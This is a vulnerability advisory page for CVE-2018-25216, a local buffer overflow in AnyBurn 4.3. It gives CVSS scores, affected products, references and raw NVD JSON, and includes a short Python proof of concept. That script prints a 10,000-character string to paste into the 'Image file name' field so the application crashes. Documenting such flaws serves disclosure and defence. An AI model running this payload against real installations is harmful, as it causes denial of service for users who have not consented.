CVE-2018-25216

Description

AnyBurn 4.3 contains a local buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the image file name field. Attackers can paste a 10000-byte payload into the 'Image file name' parameter during the 'Copy disk to Image' operation to trigger a denial of service condition.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:powersoftware:anyburn:4.3:*:*:*:*:*:*:* - VULNERABLE

AnyBurn 4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2018-25216
# Description: Generates a payload to trigger the buffer overflow in AnyBurn 4.3.
# Usage: Copy the generated string and paste it into the 'Image file name' field during 'Copy disk to Image'.

import sys

def generate_payload(length=10000):
    """Generates a string of 'A' characters with the specified length."""
    return "A" * length

if __name__ == "__main__":
    payload = generate_payload()
    print(f"[+] Payload generated (Length: {len(payload)})")
    print("[+] Copy the string below and paste it into the vulnerable field:")
    print(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25216
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25216
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25216/
[4] VulDB https://vuldb.com/cve/CVE-2018-25216
[5] http://www.anyburn.com/
[6] https://www.exploit-db.com/exploits/46002
[7] https://www.vulncheck.com/advisories/anyburn-denial-of-service-local-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25216", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:05.507", "lastModified": "2026-03-27T18:17:14.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnyBurn 4.3 contains a local buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the image file name field. Attackers can paste a 10000-byte payload into the 'Image file name' parameter during the 'Copy disk to Image' operation to trigger a denial of service condition."}, {"lang": "es", "value": "AnyBurn 4.3 contiene una vulnerabilidad local de desbordamiento de búfer que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo del nombre del archivo de imagen. Los atacantes pueden pegar una carga útil de 10000 bytes en el parámetro 'Image file name' durante la operación 'Copy disk to Image' para desencadenar una condición de denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:powersoftware:anyburn:4.3:*:*:*:*:*:*:*", "matchCriteriaId": "E4F52E00-1BD2-4AE7-B4B9-6ADF0138DBF4"}]}]}], "references": [{"url": "http://www.anyburn.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46002", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/anyburn-denial-of-service-local-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}